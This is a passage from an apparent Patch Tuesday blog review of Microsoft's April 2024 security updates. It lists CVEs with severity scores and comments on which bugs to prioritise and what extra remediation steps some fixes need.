CVE-2024-28941 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28943 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29043 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28906 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28908 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28909 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28910 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28911 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28912 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28913 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28914 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28915 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28926 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28927 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28939 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28940 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28942 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28944 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28945 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29044 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29045 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 7.5 No No RCE CVE-2024-29046 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29047 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29048 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29982 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29983 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29984 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-29985 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-26251 Microsoft SharePoint Server Spoofing Vulnerability Important 6.8 No No Spoofing CVE-2024-26254 Microsoft Virtual Machine Bus (VMBus) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2024-26210 Microsoft WDAC OLE DB Provider for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-26244 Microsoft WDAC OLE DB Provider for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-26214 Microsoft WDAC SQL Server ODBC Driver Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-20670 Outlook for Windows Spoofing Vulnerability Important 8.1 No No Spoofing CVE-2024-20678 Remote Procedure Call Runtime Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-20669 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-20688 † Secure Boot Security Feature Bypass Vulnerability Important 7.1 No No SFB CVE-2024-20689 † Secure Boot Security Feature Bypass Vulnerability Important 7.1 No No SFB CVE-2024-26168 † Secure Boot Security Feature Bypass Vulnerability Important 6.8 No No SFB CVE-2024-26171 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-26175 † Secure Boot Security Feature Bypass Vulnerability Important 7.8 No No SFB CVE-2024-26180 † Secure Boot Security Feature Bypass Vulnerability Important 8 No No SFB CVE-2024-26189 † Secure Boot Security Feature Bypass Vulnerability Important 8 No No SFB CVE-2024-26194 † Secure Boot Security Feature Bypass Vulnerability Important 7.4 No No SFB CVE-2024-26240 † Secure Boot Security Feature Bypass Vulnerability Important 8 No No SFB CVE-2024-26250 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-28896 † Secure Boot Security Feature Bypass Vulnerability Important 7.5 No No SFB CVE-2024-28897 † Secure Boot Security Feature Bypass Vulnerability Important 6.8 No No SFB CVE-2024-28898 † Secure Boot Security Feature Bypass Vulnerability Important 6.3 No No SFB CVE-2024-28903 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-28919 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-28920 † Secure Boot Security Feature Bypass Vulnerability Important 7.8 No No SFB CVE-2024-28921 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-28922 † Secure Boot Security Feature Bypass Vulnerability Important 4.1 No No SFB CVE-2024-28923 † Secure Boot Security Feature Bypass Vulnerability Important 6.4 No No SFB CVE-2024-28924 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-28925 † Secure Boot Security Feature Bypass Vulnerability Important 8 No No SFB CVE-2024-29061 † Secure Boot Security Feature Bypass Vulnerability Important 7.8 No No SFB CVE-2024-29062 † Secure Boot Security Feature Bypass Vulnerability Important 7.1 No No SFB CVE-2024-26241 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-21447 Windows Authentication Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-29056 Windows Authentication Elevation of Privilege Vulnerability Important 4.3 No No EoP CVE-2024-29050 Windows Cryptographic Services Remote Code Execution Vulnerability Important 8.4 No No RCE CVE-2024-26228 Windows Cryptographic Services Security Feature Bypass Vulnerability Important 7.8 No No SFB CVE-2024-26229 Windows CSC Service Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26237 Windows Defender Credential Guard Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26226 Windows Distributed File System (DFS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2024-29066 Windows Distributed File System (DFS) Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26221 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26222 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26223 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26224 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26227 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26231 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26233 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26172 Windows DWM Core Library Information Disclosure Vulnerability Important 5.5 No No Info CVE-2024-26216 Windows File Server Resource Management Service Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2024-29064 Windows Hyper-V Denial of Service Vulnerability Important 6.2 No No Info CVE-2024-26183 Windows Kerberos Denial of Service Vulnerability Important 6.5 No No DoS CVE-2024-26248 Windows Kerberos Elevation of Privilege Vulnerability Important 7.5 No No EoP CVE-2024-20693 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26218 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26220 Windows Mobile Hotspot Information Disclosure Vulnerability Important 5 No No Info CVE-2024-26211 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26207 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info CVE-2024-26217 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info CVE-2024-26255 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info CVE-2024-28900 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info CVE-2024-28901 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info CVE-2024-28902 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info CVE-2024-26252 Windows rndismp6.sys Remote Code Execution Vulnerability Important 6.8 No No RCE CVE-2024-26253 Windows rndismp6.sys Remote Code Execution Vulnerability Important 6.8 No No RCE CVE-2024-26179 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-26200 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-26205 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-26245 Windows SMB Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-29052 Windows Storage Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26230 Windows Telephony Server Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26239 Windows Telephony Server Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26242 Windows Telephony Server Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2024-26235 Windows Update Stack Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26236 Windows Update Stack Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2024-26243 Windows USB Print Driver Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2024-29992 Azure Identity Library for .NET Information Disclosure Vulnerability Moderate 5.5 No No Info CVE-2024-20685 Azure Private 5G Core Denial of Service Vulnerability Moderate 5.9 No No DoS CVE-2024-29049 Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability Moderate 4.1 No No Spoofing CVE-2024-29981 Microsoft Edge (Chromium-based) Spoofing Vulnerability Low 4.3 No No Spoofing CVE-2024-3156 * Chromium: CVE-2024-3156 Inappropriate implementation in V8 High N/A No No RCE CVE-2024-3158 * Chromium: CVE-2024-3158 Use after free in Bookmarks High N/A No No RCE CVE-2024-3159 * Chromium: CVE-2024-3159 Out of bounds memory access in V8 High N/A No No RCE

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

Moving on to the Critical-rated bugs, all impact Microsoft Defender for IoT. An authenticated attacker with file upload privileges could get arbitrary code execution through a path traversal vulnerability. They would need to upload specially crafted files to sensitive locations on the target. It’s not clear how likely this would be, but anything that targets your defensive tools should be taken seriously.

All told, there are almost 70 fixes for bugs that could lead to code execution in this release. The (somewhat) good news is that nearly half of these impact SQL server components. In these cases, an attacker would need to have an affected system connect to a specially crafted SQL database and perform a query. If you can socially engineer that, then you will get code execution. However, that does seem unlikely. More practically, I would concern myself with the DNS and DHCP code execution bugs in this release. I’ve already mentioned the DNS bugs. For the DHCP bugs, the attacker would need elevated privileges. This would be a good time to audit your DHCP server to see who has privileges and who should be removed. The fix for Azure Migrate is only network adjacent, but you’ll need to take extra steps to be fully protected. You need to the latest Azure Migrate Appliance's AutoUpdater, which ensures MSI installers downloaded from the Download Center have been authentically signed by Microsoft prior to installation. Check here for more details. There is an update for Excel to address an open-an-own bug, but you’re out of luck if you’re on macOS. Updates for Apple users are not available yet.

There’s a mountain of elevation of privilege (EoP) patches in this month’s release, and in most cases, exploitation requires an attacker to log on the an affected system then run their code. Again, this usually results in getting code to elevate to SYSTEM. The Azure EoPs are a little bit different and require some extra steps. The bug in Azure Arc-enabled Kubernetes could allow an attacker to gain access to sensitive information, such as Azure IoT Operations secrets and potentially other credentials or access tokens stored within the Kubernetes cluster. You’ll also need to update any affected Extensions that are used in your environment and ensure you update your Azure Arc Agent. The bug in Azure Content Gallery also needs extra actions to be protected. This bug has been mitigated by the latest change to the Azure Compute Gallery (ACG) image creation permission requirements, which means you’ll need to check the permissions and possibly update them. For information on how to update permissions, see here for details. For the Azure Monitor Agent EoP, you need to make sure you have Automatic Extension Upgrades enabled. If you don’t you can manually get the updates following these instructions. Finally, the bug in the Azure Kubernetes Service also needs some extra work. To be fully protected, you need to ensure you are running the latest version of “az confcom” and Kata Image. If you don’t have “az conform” installed, you can get the latest version by running the command “az extension add -n conform”. See the bulletin for full details.

Moving on to the security feature bypass (SFB) bugs, how in the world are there 23 different SFB patches for Secure Boot? As if that isn’t enough, you’ll need to take additional steps to be protected. The patch fixes the bugs, but the protections aren’t enabled by default. You’ll need to check out this KB article and follow the instructions listed there. With 23 bugs and manual actions needed to address them, I don’t think we should call it “secure” boot anymore. Other SFB bugs include one that could bypass RSA signature verification and a bug in BitLocker that could also bypass secure boot. At least that one just requires a patch and no extra steps.

There are more than a dozen information disclosure bugs. Fortunately, most only result in info leaks consisting of unspecified memory contents. The bug in Azure AI Search could allow an attacker to obtain sensitive API Keys. While this bug has been mitigated by a recent update to Azure AI Search's backend infrastructure, you’ll need to manually rotate specific credentials that have been notified through Azure Service Health alerts. The bug in Azure Identity Library for .NET could divulge data inside the targeted website like IDs, tokens, nonces, and other sensitive information. At least there are no additional steps beyond the patch for this one. Finally, the bug in Windows DFS could disclose the ever-descriptive “sensitive information”.

The April release is rounded out by a handful of spoofing and denial-of-service (DoS) bugs. Microsoft doesn’t provide a lot of useful information here, but if you need to focus on something, the DoS bugs in the DHCP service are where I’d start. Shutting down DHCP for any time in an enterprise will likely lead to a “no fun at all” day.

Finally, Microsoft has updated ADV99001 with the latest servicing stack updates. Be sure to check them out.

Looking Ahead

The next Patch Tuesday of 2024 will be on May 14, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Dustin Childs

A Dynamic Duo in the Fight Against Pervasive 5G Cyberthreats

Netscout

1 year ago

As 5G networks continue to grow in order to meet the increasing demands of mission-critical applications, concerns over cybersecurity are top-of-mind. The vast volume of data transmitted across 5G networks offers a ripe target for exploitation. According to a recent Palo Alto Networks study, nearly 70 percent of C...

Heather Broughton

Soevereinenbeweging ondermijnt democratische rechtsorde

AIVD - Nieuwsberichter

1 year ago

Mensen die zich soeverein verklaren keren zich af van de overheid en andere instituties. Hoewel ze veelal een open houding houden richting andere mensen, verspreiden ze wel feitelijk onjuiste verhalen over de, volgens hen, kwade intenties van de instituties. Ook willen ze zelf bepalen of wet- en regelgeving op hen van toepassing is.